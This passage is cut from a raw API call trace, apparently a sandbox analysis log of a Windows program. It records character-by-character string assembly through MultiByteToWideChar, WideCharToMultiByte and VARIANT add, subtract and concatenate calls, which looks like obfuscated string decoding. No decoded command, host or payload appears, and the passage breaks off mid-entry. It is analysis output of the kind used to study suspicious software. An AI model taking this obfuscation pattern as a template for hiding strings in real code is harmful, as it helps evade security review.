lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="T", lpUsedDefaultChar=0x0) returned 1 [0084.990] VarAdd (in: pvarLeft=0x28f5e4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe4a974, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0084.991] VarCat (in: pvarLeft=0x28f644, pvarRight=0x28f5f4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.991] VarAdd (in: pvarLeft=0x28f5e4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="v", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0084.991] VarCat (in: pvarLeft=0x28f644, pvarRight=0x28f5f4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f", lpUsedDefaultChar=0x0) returned 1 [0084.992] VarAdd (in: pvarLeft=0x28f5e4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.992] VarCat (in: pvarLeft=0x28f644, pvarRight=0x28f5f4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V", lpUsedDefaultChar=0x0) returned 1 [0084.993] VarAdd (in: pvarLeft=0x28f5e4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0xe4a974, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0084.993] VarCat (in: pvarLeft=0x28f644, pvarRight=0x28f5f4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="T", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="T", lpUsedDefaultChar=0x0) returned 1 [0084.993] VarAdd (in: pvarLeft=0x28f5e4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0084.993] VarCat (in: pvarLeft=0x28f644, pvarRight=0x28f5f4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a", lpUsedDefaultChar=0x0) returned 1 [0084.994] VarAdd (in: pvarLeft=0x28f5e4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0084.994] VarCat (in: pvarLeft=0x28f644, pvarRight=0x28f5f4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!", lpUsedDefaultChar=0x0) returned 1 [0084.995] VarAdd (in: pvarLeft=0x28f5e4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0xe4a974, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0084.995] VarCat (in: pvarLeft=0x28f644, pvarRight=0x28f5f4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X", lpUsedDefaultChar=0x0) returned 1 [0084.995] VarAdd (in: pvarLeft=0x28f5e4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.995] VarCat (in: pvarLeft=0x28f644, pvarRight=0x28f5f4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="k", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="k", lpUsedDefaultChar=0x0) returned 1 [0084.996] VarAdd (in: pvarLeft=0x28f5e4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0084.996] VarCat (in: pvarLeft=0x28f644, pvarRight=0x28f5f4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X", lpUsedDefaultChar=0x0) returned 1 [0084.997] VarAdd (in: pvarLeft=0x28f5e4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe4a974, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.997] VarCat (in: pvarLeft=0x28f644, pvarRight=0x28f5f4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_", lpUsedDefaultChar=0x0) returned 1 [0084.998] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0084.998] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R", lpUsedDefaultChar=0x0) returned 1 [0084.998] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0084.999] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="T", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="T", lpUsedDefaultChar=0x0) returned 1 [0084.999] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="G", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="G") returned 1 [0084.999] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0085.000] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0085.000] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Q", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Q", lpUsedDefaultChar=0x0) returned 1 [0085.001] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0085.001] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R", lpUsedDefaultChar=0x0) returned 1 [0085.001] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0085.002] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Y", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Y", lpUsedDefaultChar=0x0) returned 1 [0085.002] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="L", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0085.002] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R", lpUsedDefaultChar=0x0) returned 1 [0085.003] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0085.003] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a", lpUsedDefaultChar=0x0) returned 1 [0085.004] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0085.004] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R", lpUsedDefaultChar=0x0) returned 1 [0085.005] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0085.005] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0085.006] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0085.006] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U", lpUsedDefaultChar=0x0) returned 1 [0085.007] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0085.007] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X", lpUsedDefaultChar=0x0) returned 1 [0085.007] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="K", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="K") returned 1 [0085.008] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Y", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Y", lpUsedDefaultChar=0x0) returned 1 [0085.008] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="L", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0085.009] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z", lpUsedDefaultChar=0x0) returned 1 [0085.009] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0085.009] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0085.010] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0085.010] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`", lpUsedDefaultChar=0x0) returned 1 [0085.011] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0085.011] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f", lpUsedDefaultChar=0x0) returned 1 [0085.012] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Y", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="Y") returned 1 [0085.012] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`", lpUsedDefaultChar=0x0) returned 1 [0085.012] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0085.013] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a", lpUsedDefaultChar=0x0) returned 1 [0085.013] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0085.013] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R", lpUsedDefaultChar=0x0) returned 1 [0085.014] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0085.014] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z", lpUsedDefaultChar=0x0) returned 1 [0085.015] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0085.015] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0085.016] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0085.016] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P", lpUsedDefaultChar=0x0) returned 1 [0085.016] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0085.016] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0085.017] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0085.017] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0085.018] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0085.018] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0085.018] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, 